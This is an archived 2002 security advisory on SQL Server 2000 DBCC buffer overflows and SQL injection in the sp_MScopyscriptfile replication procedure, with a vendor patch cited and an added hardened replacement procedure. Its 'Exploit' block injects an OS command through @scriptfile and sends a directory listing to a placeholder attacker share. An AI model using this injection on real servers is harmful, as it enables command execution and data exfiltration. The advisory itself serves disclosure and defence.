Message-ID: <20020725234408.8641.qmail@web40006.mail.yahoo.com>
From: cesarc56 at yahoo.com (c c)
Subject: SQL Server 2000 Buffer Overflows and SQL Injection vulnerabilities.

Security Advisory

Name:    SQL Server 2000 Buffer Overflows and SQL Injection vulnerabilities.
System Affected :    SQL Server 2000, all Service Packs.
Severity :    High.
Author:    Cesar Cerrudo.
Date:    07/25/2002
Advisory Number:    CC070205

Overview:
Database Consistency Checkers (DBCCs) are command
console utilities that allow maintenance and other
operations to be performed on a SQL Server. Some of
the DBCC functions are vulnerable to buffer overflows.
Exploitation of these vulnerabilities could enable
an attacker to run code in the context of the SQL
Server service.
Some stored procedures used in database replication
are vulnerable to SQL injection. Exploitation of
these vulnerabilities could enable an attacker to run
OS commands with xp_cmdshell in the context of the SQL
Server Agent Proxy account.

Details:

The following DBCC functions contain unchecked buffers:
DBCC ADDEXTENDEDPROC ('xp_storedproc','XXX...') (a)
DBCC INDEXFRAG ('','XXX...') (b) 
DBCC UPDATEUSAGE ('','XXX...') (c) 
DBCC CHECKCONSTRAINTS ('XXX...') (c) 
DBCC SHOWCONTIG ('XXX...') (d) 
DBCC CLEANTABLE ('','XXX...') (d)
(a) Only members of sysadmin fixed server role can run
this command.
(b) Only members of sysadmin fixed server role,
db_owner or db_ddladmin fixed database role can run
this command.
(c) Only members of sysadmin fixed server role or
db_owner fixed database role can run this command.
(d) All users can run this command.
The buffer overflow in DBCC ADDEXTENDEDPROC affects
SQL Server 7.0 too.


Sp_MScopyscriptfile is one of several stored
procedures (not mentioned here for time reasons)
vulnerable to SQL injection.
Sp_MScopyscriptfile creates a directory in the SQL
Server replication directory and then copies a script
file into it. It has one input parameter, @scriptfile,
that is the name of the script file to be copied. OS
commands can be injected into that parameter and are
then executed by xp_cmdshell.

---Code snip of sp_MScopyscriptfile stored procedure
where the injection occurs---

select @cmd = N'copy "' + @scriptfile + N'" "' + @directory + N'"'
exec @retcode = master..xp_cmdshell @cmd, NO_OUTPUT

----End code snip-----

The SQL Server Agent Proxy account must be enabled to
successfully exploit these SQL injection vulnerabilities,
and it is not enabled by default.
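
As an added example (not code from the advisory, from Microsoft, or from the MS02-038 fix), the following is a hardened replacement for the snippet above that refuses @scriptfile values containing shell metacharacters before anything reaches xp_cmdshell. The procedure name usp_copyscriptfile_checked and the character allowlist are assumptions made for illustration.

```sql
-- Added example, not code from the advisory or from the MS02-038 fix.
-- Procedure name and allowlist are assumptions for illustration.
CREATE PROCEDURE dbo.usp_copyscriptfile_checked
    @scriptfile nvarchar(255),
    @directory  nvarchar(255)
AS
BEGIN
    SET NOCOUNT ON
    DECLARE @cmd nvarchar(1024), @retcode int

    -- Allowlist: hyphen, letters, digits, space, dot, underscore, colon and
    -- backslash. Everything else (including " | > < & ^) is refused, so the
    -- '" | <command> | rd "' sequence shown in the advisory never reaches
    -- the shell. In T-SQL bracket patterns ']' closes the class, so the
    -- backslash is placed last and the hyphen first to keep both literal.
    IF @scriptfile IS NULL OR LEN(@scriptfile) = 0
       OR PATINDEX(N'%[^-A-Za-z0-9 ._:\]%', @scriptfile) > 0
       OR CHARINDEX(N'..', @scriptfile) > 0   -- no parent-directory traversal
    BEGIN
        RAISERROR(N'usp_copyscriptfile_checked: @scriptfile contains disallowed characters.', 16, 1)
        RETURN 1
    END

    -- @directory is built by the server, but apply the same check so that a
    -- caller cannot smuggle metacharacters through the second parameter.
    IF @directory IS NULL OR LEN(@directory) = 0
       OR PATINDEX(N'%[^-A-Za-z0-9 ._:\]%', @directory) > 0
    BEGIN
        RAISERROR(N'usp_copyscriptfile_checked: @directory contains disallowed characters.', 16, 1)
        RETURN 1
    END

    -- Same command construction as the original, now only on validated input.
    SELECT @cmd = N'copy "' + @scriptfile + N'" "' + @directory + N'"'
    EXEC @retcode = master..xp_cmdshell @cmd, NO_OUTPUT
    RETURN @retcode
END
GO
```

Input validation narrows what can reach xp_cmdshell, but the vendor patch referenced below is the actual remedy; a replication procedure that never shells out at all would remove the exposure entirely.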

Exploit :

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ > "\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' + @command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''


More Details:
http://www.appsecinc.com/resources/alerts/mssql/02-0011.html

Vendor Status :
Microsoft was contacted, we worked together, and
Microsoft released a fix.

Patch Available : 
http://www.microsoft.com/technet/security/bulletin/MS02-038.asp

Thanks!:
Special thanks to Aaron Newman (Application Security,
Inc.) for his collaboration in testing.


